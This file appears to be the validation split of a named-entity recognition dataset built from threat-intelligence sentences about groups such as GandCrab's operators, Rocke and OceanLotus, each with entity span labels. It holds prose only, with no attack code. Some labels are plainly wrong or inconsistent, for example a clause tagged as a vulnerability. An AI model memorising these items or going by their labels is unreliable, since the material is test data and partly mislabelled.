{"text": "These gtags have been closely associated with LUNAR SPIDER activity .", "spans": {}, "info": {"id": "dnrti_valid_000238", "source": "dnrti_valid"}}
{"text": "Unit 42 followed network traces and pivoted on the information left behind by this actor , such as open directories , document metadata , and binary peculiarities , which enabled us to find a custom-made piece of malware , that we named \" CapturaTela \" .", "spans": {"Organization: Unit 42": [[0, 7]]}, "info": {"id": "dnrti_valid_000239", "source": "dnrti_valid"}}
{"text": "Our telemetry for this campaign identified email as the primary delivery mechanism and found the first related samples were distributed in August 2018 .", "spans": {}, "info": {"id": "dnrti_valid_000240", "source": "dnrti_valid"}}
{"text": "Aside from the use of the custom trojan CapturaTela , the actor makes extensive use of several other remote access Trojans to perform its malicious activities .", "spans": {}, "info": {"id": "dnrti_valid_000241", "source": "dnrti_valid"}}
{"text": "Why would OurMine want to target WikiLeaks .", "spans": {"Organization: WikiLeaks": [[33, 42]]}, "info": {"id": "dnrti_valid_000242", "source": "dnrti_valid"}}
{"text": "Instead , OurMine had managed to alter WikiLeaks 's DNS records ( held by a third-party registrar ) to direct anyone who tried to visit wikileaks.org to visit a different IP address which definitely wasn't under the control of Julian Assange and his cronies .", "spans": {"Organization: WikiLeaks": [[39, 48]]}, "info": {"id": "dnrti_valid_000243", "source": "dnrti_valid"}}
{"text": "We don't know how OurMine managed to access WikiLeaks 's DNS records , but past experience has shown that their typical modus operandi is simply to log in using their victim 's password .", "spans": {"Organization: WikiLeaks": [[44, 53]]}, "info": {"id": "dnrti_valid_000244", "source": "dnrti_valid"}}
{"text": "Alternatively , OurMine might have used social engineering to trick WikiLeaks 's DNS provider into handing over the credentials , or simple requested that a password reset link be sent to a compromised email address .", "spans": {"Organization: WikiLeaks": [[68, 77]], "Organization: DNS provider": [[81, 93]]}, "info": {"id": "dnrti_valid_000245", "source": "dnrti_valid"}}
{"text": "Alternatively , the attackers might have used social engineering to trick WikiLeaks 's DNS provider into handing over the credentials , or simple requested that a password reset link be sent to a compromised email address .", "spans": {"Organization: WikiLeaks": [[74, 83]], "Organization: DNS provider": [[87, 99]]}, "info": {"id": "dnrti_valid_000246", "source": "dnrti_valid"}}
{"text": "Known for hijacking prominent social media accounts , the self-styled white hat hacking group OurMine took over a number of verified Twitter and Facebook accounts belonging to the cable network .", "spans": {"Organization: Twitter": [[133, 140]], "Organization: Facebook": [[145, 153]]}, "info": {"id": "dnrti_valid_000247", "source": "dnrti_valid"}}
{"text": "Last year , OurMine victimized Marvel , The New York Times , and even the heads of some of the biggest technology companies in the world .", "spans": {"Organization: The New York Times": [[40, 58]], "Organization: technology companies": [[103, 123]]}, "info": {"id": "dnrti_valid_000248", "source": "dnrti_valid"}}
{"text": "Mark Zuckerberg , Jack Dorsey , Sundar Pichai , and Daniel Ek — the CEOs of Facebook , Twitter , Google and Spotify , respectively — have also fallen victim to the hackers , dispelling the notion that a career in software and technology exempts one from being compromised .", "spans": {"Organization: Facebook": [[76, 84]], "Organization: Twitter": [[87, 94]], "Organization: Google": [[97, 103]]}, "info": {"id": "dnrti_valid_000249", "source": "dnrti_valid"}}
{"text": "The group is well known : They hijacked WikiLeaks' DNS last month shortly after they took over HBO 's Twitter account ; last year , they took over Mark Zuckerberg 's Twitter and Pinterest accounts ; and they hit both BuzzFeed and TechCrunch not long after that .", "spans": {"Organization: WikiLeaks'": [[40, 50]], "Organization: Twitter": [[102, 109], [166, 173]], "Organization: Pinterest": [[178, 187]], "Organization: BuzzFeed": [[217, 225]], "Organization: TechCrunch": [[230, 240]]}, "info": {"id": "dnrti_valid_000250", "source": "dnrti_valid"}}
{"text": "OurMine is well known : They hijacked WikiLeaks' DNS last month shortly after they took over HBO 's Twitter account ; last year , they took over Mark Zuckerberg 's Twitter and Pinterest accounts ; and they hit both BuzzFeed and TechCrunch not long after that .", "spans": {"Organization: WikiLeaks'": [[38, 48]], "Organization: Twitter": [[100, 107], [164, 171]], "Organization: Pinterest": [[176, 185]], "Organization: BuzzFeed": [[215, 223]], "Organization: TechCrunch": [[228, 238]]}, "info": {"id": "dnrti_valid_000251", "source": "dnrti_valid"}}
{"text": "The group 's primary goal is demonstrating to companies that they have weak security .", "spans": {}, "info": {"id": "dnrti_valid_000252", "source": "dnrti_valid"}}
{"text": "US intelligence agencies pinned the breach on North Korea ( one of the hacking group 's demands was that Sony pull The Interview , Seth Rogan 's comedy about a plot to assassinate Kim Jong-Un ) .", "spans": {"Organization: intelligence agencies": [[3, 24]], "Organization: Sony": [[105, 109]]}, "info": {"id": "dnrti_valid_000253", "source": "dnrti_valid"}}
{"text": "Of course , Sony ( one of Vevo 's joint owners ) fell victim to a devastating hack in 2014 after a group of hackers calling themselves the \" Guardians of Peace \" dumped a wealth of its confidential data online .", "spans": {"Organization: Sony": [[12, 16]]}, "info": {"id": "dnrti_valid_000254", "source": "dnrti_valid"}}
{"text": "The cryptominer employed by Pacha Group , labeled Linux.GreedyAntd by Intezer , was completely undetected by all leading engines , demonstrating the sophistication of this malware .", "spans": {"Organization: Intezer": [[70, 77]]}, "info": {"id": "dnrti_valid_000255", "source": "dnrti_valid"}}
{"text": "Intezer has evidence dating back to September 2018 which shows Pacha Group has been using a cryptomining malware that has gone undetected on other engines .", "spans": {"Organization: Intezer": [[0, 7]]}, "info": {"id": "dnrti_valid_000256", "source": "dnrti_valid"}}
{"text": "The new miner employed by Pacha Group , named Linux.GreedyAntd , has shown to be more sophisticated than the average Linux threat , using evasion techniques rarely seen in Linux malware .", "spans": {}, "info": {"id": "dnrti_valid_000257", "source": "dnrti_valid"}}
{"text": "Pacha Group is believed to be of Chinese origin , and is actively delivering new campaigns , deploying a broad number of components , many of which are undetected and operating within compromised third party servers .", "spans": {}, "info": {"id": "dnrti_valid_000258", "source": "dnrti_valid"}}
{"text": "We have labeled the undetected Linux.Antd variants , Linux.GreedyAntd and classified the threat actor as Pacha Group .", "spans": {}, "info": {"id": "dnrti_valid_000259", "source": "dnrti_valid"}}
{"text": "Based on our findings Linux.GreedyAntd 's operations closely resemble previous cryptojacking campaigns deployed by Pacha Group in the past .", "spans": {}, "info": {"id": "dnrti_valid_000260", "source": "dnrti_valid"}}
{"text": "Among the artifacts hosted in GreedyAntd 's servers , we managed to find a single component not related to the same cryptojacking operation just previously discussed and leveraged by Pacha Group .", "spans": {}, "info": {"id": "dnrti_valid_000261", "source": "dnrti_valid"}}
{"text": "It was one of the few ransomware strains that were being mass-distributed via email spam and exploit kits , but also as part of targeted attacks against high-profile organizations ( a tactic known as big-game hunting ) at the same time .", "spans": {"Organization: high-profile organizations": [[153, 179]]}, "info": {"id": "dnrti_valid_000262", "source": "dnrti_valid"}}
{"text": "The GandCrab author also had a spat with South Korean security vendor AhnLab last summer after the security firm released a vaccine for the GandCrab ransomware .", "spans": {"Organization: AhnLab": [[70, 76]], "Organization: security firm": [[99, 112]]}, "info": {"id": "dnrti_valid_000263", "source": "dnrti_valid"}}
{"text": "Recently , Sophos Labs has observed criminal groups scanning the internet for open MySQL databases running on Windows systems , which they tried to infect with GandCrab .", "spans": {"Organization: Sophos Labs": [[11, 22]]}, "info": {"id": "dnrti_valid_000264", "source": "dnrti_valid"}}
{"text": "CrowdStrike Intelligence has recently observed PINCHY SPIDER affiliates deploying GandCrab ransomware in enterprise environments , using lateral movement techniques and tooling commonly associated with nation-state adversary groups and penetration testing teams .", "spans": {"Organization: CrowdStrike Intelligence": [[0, 24]]}, "info": {"id": "dnrti_valid_000265", "source": "dnrti_valid"}}
{"text": "Probably the most high-profile attack that GandCrab was behind is a series of infections at customers of remote IT support firms in the month of February .", "spans": {"Organization: customers": [[92, 101]], "Organization: IT support firms": [[112, 128]]}, "info": {"id": "dnrti_valid_000266", "source": "dnrti_valid"}}
{"text": "CrowdStrike® Intelligence has recently observed PINCHY SPIDER affiliates deploying GandCrab ransomware in enterprise environments , using lateral movement techniques and tooling commonly associated with nation-state adversary groups and penetration testing teams .", "spans": {"Organization: CrowdStrike® Intelligence": [[0, 25]]}, "info": {"id": "dnrti_valid_000267", "source": "dnrti_valid"}}
{"text": "PINCHY SPIDER is the criminal group behind the development of the ransomware most commonly known as GandCrab , which has been active since January 2018 .", "spans": {}, "info": {"id": "dnrti_valid_000268", "source": "dnrti_valid"}}
{"text": "PINCHY SPIDER sells access to use GandCrab ransomware under a partnership program with a limited number of accounts .", "spans": {}, "info": {"id": "dnrti_valid_000269", "source": "dnrti_valid"}}
{"text": "The main catalyst for dedicated development by PINCHY SPIDER , however , has been an ongoing battle with cybersecurity providers that are actively developing GandCrab mitigations and decryptors .", "spans": {"Organization: cybersecurity providers": [[105, 128]]}, "info": {"id": "dnrti_valid_000270", "source": "dnrti_valid"}}
{"text": "In February , PINCHY SPIDER released version 5.2 of GandCrab , which is immune to the decryption tools developed for earlier versions of GandCrab and in fact , was deployed the day before the release of the latest decryptor .", "spans": {}, "info": {"id": "dnrti_valid_000271", "source": "dnrti_valid"}}
{"text": "CrowdStrike Intelligence first identified new GandCrab ransomware deployment tactics in mid-February , when a threat actor was observed performing actions on a victim host in order to install GandCrab .", "spans": {"Organization: CrowdStrike Intelligence": [[0, 24]]}, "info": {"id": "dnrti_valid_000272", "source": "dnrti_valid"}}
{"text": "Using RDP and stolen credentials from the initially compromised host , the threat actor then proceeded to move laterally around the victim network and was able to deploy GandCrab across several other hosts .", "spans": {}, "info": {"id": "dnrti_valid_000273", "source": "dnrti_valid"}}
{"text": "Near the end of February , CrowdStrike Intelligence observed another incident in which similar manual lateral movement techniques were used to deploy GandCrab across multiple hosts in an enterprise .", "spans": {"Organization: CrowdStrike Intelligence": [[27, 51]]}, "info": {"id": "dnrti_valid_000274", "source": "dnrti_valid"}}
{"text": "Once Domain Controller access was acquired , Pinchy Spider used the enterprise 's own IT systems management software , LANDesk , to deploy a loader to hosts across the enterprise .", "spans": {}, "info": {"id": "dnrti_valid_000275", "source": "dnrti_valid"}}
{"text": "This loader , known as Phorpiex Downloader , is not specifically tied to GandCrab or PINCHY SPIDER , and it has previously been observed dropping other malware , such as Smoke Bot , Azorult , and XMRig .", "spans": {}, "info": {"id": "dnrti_valid_000276", "source": "dnrti_valid"}}
{"text": "As reported in the CrowdStrike 2018 Global Threat Report , big game hunting was a trend that helped define the criminal threat landscape in 2018 .", "spans": {}, "info": {"id": "dnrti_valid_000277", "source": "dnrti_valid"}}
{"text": "BOSS SPIDER used both enterprise and per-host pricing during their campaigns .", "spans": {}, "info": {"id": "dnrti_valid_000278", "source": "dnrti_valid"}}
{"text": "Both INDRIK SPIDER ( with BitPaymer ransomware ) and GRIM SPIDER ( with Ryuk ransomware ) have made headlines with their high profile victims and ransom profits , demonstrating that big game hunting is a lucrative enterprise .", "spans": {}, "info": {"id": "dnrti_valid_000279", "source": "dnrti_valid"}}
{"text": "Running successful big game hunting operations results in a higher average profit per victim , allowing adversaries like PINCHY SPIDER and their partners to increase their criminal revenue quickly .", "spans": {}, "info": {"id": "dnrti_valid_000280", "source": "dnrti_valid"}}
{"text": "The threat actor Rocke was originally revealed by Talos in August of 2018 and many remarkable behaviors were disclosed in their blog post .", "spans": {"Organization: Talos": [[50, 55]]}, "info": {"id": "dnrti_valid_000281", "source": "dnrti_valid"}}
{"text": "The family was suspected to be developed by the Iron cybercrime group and it's also associated with the Xbash malware we reported on in September of 2018 .", "spans": {}, "info": {"id": "dnrti_valid_000282", "source": "dnrti_valid"}}
{"text": "The threat actor Rocke was first reported by Cisco Talos in late July 2018 .", "spans": {"Organization: Cisco Talos": [[45, 56]]}, "info": {"id": "dnrti_valid_000283", "source": "dnrti_valid"}}
{"text": "The ultimate goal of this threat is to mine Monero cryptocurrency in compromised Linux machines .", "spans": {}, "info": {"id": "dnrti_valid_000284", "source": "dnrti_valid"}}
{"text": "To deliver the malware to the victim machines , the Rocke group exploits vulnerabilities in Apache Struts 2 , Oracle WebLogic , and Adobe ColdFusion .", "spans": {"Vulnerability: Rocke group exploits vulnerabilities": [[52, 88]]}, "info": {"id": "dnrti_valid_000285", "source": "dnrti_valid"}}
{"text": "Once the C2 connection is established , malware used by the Rocke group downloads shell script named as \" a7 \" to the victim machine .", "spans": {}, "info": {"id": "dnrti_valid_000286", "source": "dnrti_valid"}}
{"text": "To be more specific , the malware uninstalls cloud security products by Alibaba Cloud and Tencent Cloud .", "spans": {}, "info": {"id": "dnrti_valid_000287", "source": "dnrti_valid"}}
{"text": "Public cloud infrastructure is one of the main targets for Rocke .", "spans": {}, "info": {"id": "dnrti_valid_000288", "source": "dnrti_valid"}}
{"text": "FortiGuard Labs has been monitoring a Linux coin mining campaign from \" Rocke \" – a malware threat group specializing in cryptomining .", "spans": {"Organization: FortiGuard Labs": [[0, 15]]}, "info": {"id": "dnrti_valid_000289", "source": "dnrti_valid"}}
{"text": "The malicious bash script components of the malware are hosted in Pastebin , with the profile name \" SYSTEMTEN \" , which is very similar to previous names used by the \" Rocke \" threat group .", "spans": {}, "info": {"id": "dnrti_valid_000290", "source": "dnrti_valid"}}
{"text": "However , around a month ago , Rocke started targeting systems that run Jenkins by attempting to exploit CVE-2018-1000861 and CVE-2019-1003000 .", "spans": {"Vulnerability: CVE-2018-1000861": [[105, 121]], "Vulnerability: CVE-2019-1003000": [[126, 142]]}, "info": {"id": "dnrti_valid_000291", "source": "dnrti_valid"}}
{"text": "By utilizing a hook library , it is more complicated for users to manually detect and remove the infection from their systems , giving the threat actors more time to generate profit .", "spans": {}, "info": {"id": "dnrti_valid_000292", "source": "dnrti_valid"}}
{"text": "The group also made it back into the news with the recent WannaCry ransomware that targeted computers around the globe ; it piggybacked on exploits revealed by the Shadow Brokers .", "spans": {}, "info": {"id": "dnrti_valid_000293", "source": "dnrti_valid"}}
{"text": "A mysterious hacker or hackers going by the name \" The Shadow Brokers \" claims to have hacked a group linked to the NSA and dumped a bunch of its hacking tools .", "spans": {"Organization: NSA": [[116, 119]]}, "info": {"id": "dnrti_valid_000294", "source": "dnrti_valid"}}
{"text": "The Shadow Brokers claimed to have hacked the Equation Group and stolen some of its hacking tools .", "spans": {}, "info": {"id": "dnrti_valid_000295", "source": "dnrti_valid"}}
{"text": "The Shadow Brokers first emerged in August , when they posted links to a selection of NSA exploits and hacking tools onto Github and other websites .", "spans": {"Vulnerability: NSA exploits": [[86, 98]]}, "info": {"id": "dnrti_valid_000296", "source": "dnrti_valid"}}
{"text": "The Shadow Brokers , the group that publicly dumped a cache of NSA hacking tools , appears to be back and ready to sell stolen material on an individual basis .", "spans": {}, "info": {"id": "dnrti_valid_000297", "source": "dnrti_valid"}}
{"text": "Wh1sks estimated that , between June and early August , the Shadow Brokers have made up to $88,000 in an alternative cryptocurrency called Monero .", "spans": {"Organization: Wh1sks": [[0, 6]]}, "info": {"id": "dnrti_valid_000298", "source": "dnrti_valid"}}
{"text": "Moreover , Wh1sks was able to find out the email addresses of five people who have subscribed to the Shadow Brokers' monthly dump service .", "spans": {"Organization: Wh1sks": [[11, 17]]}, "info": {"id": "dnrti_valid_000299", "source": "dnrti_valid"}}
{"text": "Buried among this new treasure trove , there are several mentions of previously disclosed NSA top secret programs and software such as \" STRAITBIZARRE \" , used to control implants remotely , and \" JEEPFLEA \" , a project to hack the money transferring system SWIFT .", "spans": {"Organization: NSA": [[90, 93]]}, "info": {"id": "dnrti_valid_000300", "source": "dnrti_valid"}}
{"text": "The Shadow Brokers have long claimed that the tools they release are from the \" Equation Group \" , the name of a government hacking group outed by Kaspersky Lab in 2015 , which is widely believed to be the NSA .", "spans": {"Organization: Kaspersky Lab": [[147, 160]], "Organization: NSA": [[206, 209]]}, "info": {"id": "dnrti_valid_000301", "source": "dnrti_valid"}}
{"text": "Recently , FireEye released a great report on one of the more active groups , now known as APT30 .", "spans": {"Organization: FireEye": [[11, 18]]}, "info": {"id": "dnrti_valid_000302", "source": "dnrti_valid"}}
{"text": "In addition , Kaspersky discovered that the Winnti group uses a popular backdoor known as PlugX which also has Chinese origins .", "spans": {"Organization: Kaspersky": [[14, 23]]}, "info": {"id": "dnrti_valid_000303", "source": "dnrti_valid"}}
{"text": "Previous work published by security vendor FireEye in October 2014 suggests APT28 might be of Russian origin .", "spans": {"Organization: FireEye": [[43, 50]]}, "info": {"id": "dnrti_valid_000304", "source": "dnrti_valid"}}
{"text": "After publishing our initial series of blogposts back in 2016 , Kaspersky has continued to track the ScarCruft threat actor .", "spans": {"Organization: Kaspersky": [[64, 73]]}, "info": {"id": "dnrti_valid_000305", "source": "dnrti_valid"}}
{"text": "Based on the ScarCruft’s recent activities , Kaspersky strongly believes that this ScarCruft group is likely to continue to evolve .", "spans": {"Organization: Kaspersky": [[45, 54]]}, "info": {"id": "dnrti_valid_000306", "source": "dnrti_valid"}}
{"text": "Kaspersky also discovered an interesting piece of rare malware created by this threat actor ScarCruft .", "spans": {"Organization: Kaspersky": [[0, 9]]}, "info": {"id": "dnrti_valid_000307", "source": "dnrti_valid"}}
{"text": "Kaspersky witnessed the ScarCruft threat actor extensively testing a known public exploit during its preparation for the next campaign .", "spans": {"Organization: Kaspersky": [[0, 9]]}, "info": {"id": "dnrti_valid_000308", "source": "dnrti_valid"}}
{"text": "Based on our telemetry , Kaspersky can reassemble ScarCruft’s binary infection procedure .", "spans": {"Organization: Kaspersky": [[25, 34]]}, "info": {"id": "dnrti_valid_000309", "source": "dnrti_valid"}}
{"text": "In addition , Kaspersky analyzed the victims of this campaign and spotted an interesting overlap of this campaign with another APT actor known as DarkHotel .", "spans": {"Organization: Kaspersky": [[14, 23]]}, "info": {"id": "dnrti_valid_000310", "source": "dnrti_valid"}}
{"text": "Secureworks researchers investigated activities associated with the BRONZE BUTLER (also known as Tick) threat group , which likely originates in the People .", "spans": {"Organization: Secureworks": [[0, 11]]}, "info": {"id": "dnrti_valid_000311", "source": "dnrti_valid"}}
{"text": "However , an investigation by Symantec has found that Butterfly has been active since at least March 2012 and its attacks have not only continued to the present day , but have also increased in number .", "spans": {"Organization: Symantec": [[30, 38]]}, "info": {"id": "dnrti_valid_000312", "source": "dnrti_valid"}}
{"text": "Talos assesses with high confidence that Group 123 was responsible for six campaigns .", "spans": {"Organization: Talos": [[0, 5]]}, "info": {"id": "dnrti_valid_000313", "source": "dnrti_valid"}}
{"text": "Attacks launched by Scarlet Mimic were publicly exposed on 2013 in a Trend Micro report about the FakeM Trojan .", "spans": {"Organization: Trend Micro": [[69, 80]]}, "info": {"id": "dnrti_valid_000314", "source": "dnrti_valid"}}
{"text": "Finally , Talos identified a 6th campaign that is also linked to Group 123 .", "spans": {"Organization: Talos": [[10, 15]]}, "info": {"id": "dnrti_valid_000315", "source": "dnrti_valid"}}
{"text": "As Talos observed at the beginning of 2017 , Group 123 started a campaign corresponding with the new year in 2018 .", "spans": {"Organization: Talos": [[3, 8]]}, "info": {"id": "dnrti_valid_000316", "source": "dnrti_valid"}}
{"text": "Last month , researchers at Kaspersky reported on a Lazarus APT campaign targeting both macOS and Windows users .", "spans": {"Organization: Kaspersky": [[28, 37]]}, "info": {"id": "dnrti_valid_000317", "source": "dnrti_valid"}}
{"text": "Cylance uncovered several bespoke backdoors deployed by the OceanLotus APT Group a.k.a APT32 , Cobalt Kitty .", "spans": {"Organization: Cylance": [[0, 7]]}, "info": {"id": "dnrti_valid_000318", "source": "dnrti_valid"}}
{"text": "While continuing to monitor activity of the OceanLotus APT Group , Cylance researchers uncovered a novel payload loader that utilizes steganography to read an encrypted payload concealed within a .png image file .", "spans": {"Organization: Cylance": [[67, 74]]}, "info": {"id": "dnrti_valid_000319", "source": "dnrti_valid"}}
{"text": "Gobelin Panda , a.k.a Goblin Panda , is a group that has been identified by CrowdStrike as a Chinese threat actor .", "spans": {"Organization: CrowdStrike": [[76, 87]]}, "info": {"id": "dnrti_valid_000320", "source": "dnrti_valid"}}
{"text": "CrowdStrike observed Goblin Panda activity spike as tensions among South China Sea nations has risen .", "spans": {"Organization: CrowdStrike": [[0, 11]]}, "info": {"id": "dnrti_valid_000321", "source": "dnrti_valid"}}
{"text": "This confirms Tropic Trooper is using Poison Ivy as part of their toolkit , something speculated in the original Trend Micro report but not confirmed by them .", "spans": {"Organization: Trend Micro": [[113, 124]]}, "info": {"id": "dnrti_valid_000322", "source": "dnrti_valid"}}
{"text": "In a 2018 blogpost , ESET researchers predicted that Turla would use more and more generic tools .", "spans": {"Organization: ESET": [[21, 25]]}, "info": {"id": "dnrti_valid_000323", "source": "dnrti_valid"}}
{"text": "ESET researchers will continue monitoring new Turla activities and will publish relevant information on our blog .", "spans": {"Organization: ESET": [[0, 4]]}, "info": {"id": "dnrti_valid_000324", "source": "dnrti_valid"}}
{"text": "ESET researchers analyze new TTPs attributed to the Turla group that leverage PowerShell to run malware in-memory only .", "spans": {"Organization: ESET": [[0, 4]]}, "info": {"id": "dnrti_valid_000325", "source": "dnrti_valid"}}
{"text": "ESET have been tracking the malicious activities related to the Ke3chang group .", "spans": {"Organization: ESET": [[0, 4]]}, "info": {"id": "dnrti_valid_000326", "source": "dnrti_valid"}}
{"text": "According to Kaspersky Lab’s report , NetTraveler has been active since as early as 2004; however , the highest volume of activity occurred from 2010 – 2013 .", "spans": {"Organization: Kaspersky": [[13, 22]]}, "info": {"id": "dnrti_valid_000327", "source": "dnrti_valid"}}
{"text": "Kaspersky Lab’s experts calculated the amount of stolen data stored on NetTraveler’s C&C servers to be more than 22 gigabytes .", "spans": {"Organization: Kaspersky": [[0, 9]]}, "info": {"id": "dnrti_valid_000328", "source": "dnrti_valid"}}
{"text": "FireEye believes the Ke3chang attackers likely began attempting to exfiltrate sensitive data shortly thereafter .", "spans": {"Organization: FireEye": [[0, 7]]}, "info": {"id": "dnrti_valid_000329", "source": "dnrti_valid"}}
{"text": "This report details some of the technical findings of the Lazarus Group’s malware , observed by Novetta during Operation Blockbuster .", "spans": {"Organization: Novetta": [[96, 103]], "Organization: Operation Blockbuster": [[111, 132]]}, "info": {"id": "dnrti_valid_000330", "source": "dnrti_valid"}}
{"text": "The Lazarus Group was first identified in Novetta’s report Operation Blockbuster in February 2016 .", "spans": {"Organization: Novetta’s": [[42, 51]]}, "info": {"id": "dnrti_valid_000331", "source": "dnrti_valid"}}
{"text": "FireEye has not identified APT33 using SHAPESHIFT , but APT33 is the only group FireEye has seen to use DROPSHOT .", "spans": {"Organization: FireEye": [[0, 7], [80, 87]]}, "info": {"id": "dnrti_valid_000332", "source": "dnrti_valid"}}
{"text": "In 2018 , Kaspersky Labs published a report that analyzed Turla threat group .", "spans": {"Organization: Kaspersky": [[10, 19]]}, "info": {"id": "dnrti_valid_000333", "source": "dnrti_valid"}}
{"text": "Starting in February 2018 , Palo Alto identified a campaign of attacks performed by members of Gorgon Group targeting governmental organizations in the United Kingdom , Spain , Russia , and the United States .", "spans": {"Organization: Palo Alto": [[28, 37]], "Organization: governmental organizations": [[118, 144]]}, "info": {"id": "dnrti_valid_000334", "source": "dnrti_valid"}}
{"text": "Insikt Group investigated the domain and hosting infrastructure used by the APT33 group .", "spans": {"Organization: Insikt Group": [[0, 12]]}, "info": {"id": "dnrti_valid_000336", "source": "dnrti_valid"}}
{"text": "Symantec tracks the group behind this activity as Blackfly and detects the malware they use as Backdoor.Winnti .", "spans": {"Organization: Symantec": [[0, 8]]}, "info": {"id": "dnrti_valid_000337", "source": "dnrti_valid"}}
{"text": "Symantec discovered Suckfly , an advanced threat group , conducting targeted attacks using multiple stolen certificates , as well as hacktools and custom malware .", "spans": {"Organization: Symantec": [[0, 8]]}, "info": {"id": "dnrti_valid_000339", "source": "dnrti_valid"}}
{"text": "In April Novetta released its excellent report on the Winnti malware spotted in the operations of Axiom group .", "spans": {"Organization: Novetta": [[9, 16]]}, "info": {"id": "dnrti_valid_000340", "source": "dnrti_valid"}}
{"text": "A few days ago , Symantec discovered a new document that appears to be part of the ongoing BlackEnergy APT group attacks against Ukraine .", "spans": {"Organization: Symantec": [[17, 25]]}, "info": {"id": "dnrti_valid_000341", "source": "dnrti_valid"}}
{"text": "While analyzing a campaign run by the Gamaredon group , FortiGuard Labs discovered the tools they used to prepare the attack and found artifacts left behind by the actors that allowed us to perform a large amount of forensic analysis .", "spans": {"Organization: FortiGuard Labs": [[56, 71]]}, "info": {"id": "dnrti_valid_000342", "source": "dnrti_valid"}}
{"text": "In this blog , Unit 42 provides details of the tools and tactics we observed on these compromised SharePoint servers , explain how we believe these connect to the Emissary Panda threat group .", "spans": {"Organization: Unit 42": [[15, 22]]}, "info": {"id": "dnrti_valid_000343", "source": "dnrti_valid"}}
{"text": "QiAnXin identified this APT group coded as ‘APT-C-35’ in 2017 , who is mainly targeting Pakistan and other South Asian countries for cyber espionage .", "spans": {"Organization: QiAnXin": [[0, 7]]}, "info": {"id": "dnrti_valid_000344", "source": "dnrti_valid"}}
{"text": "CTU researchers assess with moderate confidence that APT28 is operating from the Russian Federation and is gathering intelligence on behalf of the Russian government .", "spans": {"Organization: CTU": [[0, 3]], "Organization: Russian government": [[147, 165]]}, "info": {"id": "dnrti_valid_000345", "source": "dnrti_valid"}}
{"text": "It is worth noting that during our investigation f-secure uncovered links between infrastructure associated with the Callisto Group and infrastructure used to host online stores selling controlled substances .", "spans": {}, "info": {"id": "dnrti_valid_000346", "source": "dnrti_valid"}}
{"text": "As Unit 42 have observed throughout our tracking of the OilRig group , adopting proven tactics has been a common behavior over time .", "spans": {"Organization: Unit 42": [[3, 10]]}, "info": {"id": "dnrti_valid_000347", "source": "dnrti_valid"}}
{"text": "The OceanLotus group was first revealed and named by QiAnXin in May 2015 .", "spans": {"Organization: QiAnXin": [[53, 60]]}, "info": {"id": "dnrti_valid_000348", "source": "dnrti_valid"}}
{"text": "The OceanLotus , an APT group said to have a Vietnamese background , was first exposed and named by QiAnXin in May 2015 .", "spans": {"Organization: QiAnXin": [[100, 107]]}, "info": {"id": "dnrti_valid_000349", "source": "dnrti_valid"}}
{"text": "The QiAnXin keeps a close eye on activities made by OceanLotus .", "spans": {"Organization: QiAnXin": [[4, 11]]}, "info": {"id": "dnrti_valid_000350", "source": "dnrti_valid"}}
{"text": "Donot , named and tracked by PatchSky , is an attack group that mainly targets countries such as Pakistan in South Asia .", "spans": {"Organization: PatchSky": [[29, 37]]}, "info": {"id": "dnrti_valid_000351", "source": "dnrti_valid"}}
{"text": "After investigation , QiAnXin suspect this attack is carried out by Molerats .", "spans": {"Organization: QiAnXin": [[22, 29]]}, "info": {"id": "dnrti_valid_000352", "source": "dnrti_valid"}}
{"text": "In June 2017 , QiAnXin discovered new malware used by Molerats .", "spans": {"Organization: QiAnXin": [[15, 22]]}, "info": {"id": "dnrti_valid_000353", "source": "dnrti_valid"}}
{"text": "Last month , QiAnXin captured multiple phishing emails sent by TA505 Group to target financial institutions .", "spans": {"Organization: QiAnXin": [[13, 20]]}, "info": {"id": "dnrti_valid_000354", "source": "dnrti_valid"}}
{"text": "QiAnXin confirmed that this is a DarkHydrus Group’s new attack targeting Middle East region .", "spans": {"Organization: QiAnXin": [[0, 7]]}, "info": {"id": "dnrti_valid_000355", "source": "dnrti_valid"}}
{"text": "First described by Kaspersky in 2014 and later by Cylance in 2017 , Machete is a piece of malware found to be targeting high profile individuals and organizations in Latin American countries .", "spans": {"Organization: Kaspersky": [[19, 28]], "Organization: Cylance": [[50, 57]]}, "info": {"id": "dnrti_valid_000356", "source": "dnrti_valid"}}
{"text": "It’s now relying on a new DNS-based attack technique to better cloak command and control communications between Greenbug and the malware , ” said Dennis Schwarz , research analyst on Arbor , in an interview with Threatpost .", "spans": {"Organization: Arbor": [[183, 188]]}, "info": {"id": "dnrti_valid_000357", "source": "dnrti_valid"}}
{"text": "After thorough analysis , ESET researchers are highly confident that this campaign is run by the OceanLotus group , also known as APT32 and APT-C-00 .", "spans": {"Organization: ESET": [[26, 30]]}, "info": {"id": "dnrti_valid_000358", "source": "dnrti_valid"}}
{"text": "360 Helios Team captured the first Trojan of the Poison Ivy Group in December 2007 .", "spans": {"Organization: 360 Helios Team": [[0, 15]]}, "info": {"id": "dnrti_valid_000359", "source": "dnrti_valid"}}
{"text": "Through research , 360 Helios Team has found that , since 2007 , the Poison Ivy Group has carried out 11 years of cyber espionage campaigns against Chinese key units and departments , such as national defense , government , science and technology , education and maritime agencies .", "spans": {"Organization: 360 Helios Team": [[19, 34]], "Organization: government": [[211, 221]], "Organization: maritime agencies": [[263, 280]]}, "info": {"id": "dnrti_valid_000360", "source": "dnrti_valid"}}
{"text": "In addition , Antiy Lab revealed the APT organization Green Spot on September 19 , 2018 .", "spans": {"Organization: Antiy Lab": [[14, 23]]}, "info": {"id": "dnrti_valid_000361", "source": "dnrti_valid"}}
{"text": "Recently , the 360 Core Security discovered an APT attack code named as APT-C-26 against cryptocurrency institutions and related individuals .", "spans": {"Organization: 360 Core Security": [[15, 32]]}, "info": {"id": "dnrti_valid_000362", "source": "dnrti_valid"}}
{"text": "This APT attack was analyzed and attributed upon the detection and 360 Core Security now confirmed its association with the APT-C-06 Group .", "spans": {"Organization: 360 Core Security": [[67, 84]]}, "info": {"id": "dnrti_valid_000363", "source": "dnrti_valid"}}
{"text": "In April , 2018 , the 360 Core Security takes the lead in capturing the APT-C-06 group’s new APT attack using 0-day vulnerabilities (CVE-2018-8174) in the wild .", "spans": {"Organization: 360 Core Security": [[22, 39]], "Vulnerability: (CVE-2018-8174)": [[132, 147]]}, "info": {"id": "dnrti_valid_000364", "source": "dnrti_valid"}}
{"text": "ESET researchers have dissected some of the latest additions to the malicious toolkit of the Advanced Persistent Threat (APT) group known as OceanLotus , also dubbed APT32 and APT-C-00 .", "spans": {"Organization: ESET": [[0, 4]]}, "info": {"id": "dnrti_valid_000365", "source": "dnrti_valid"}}
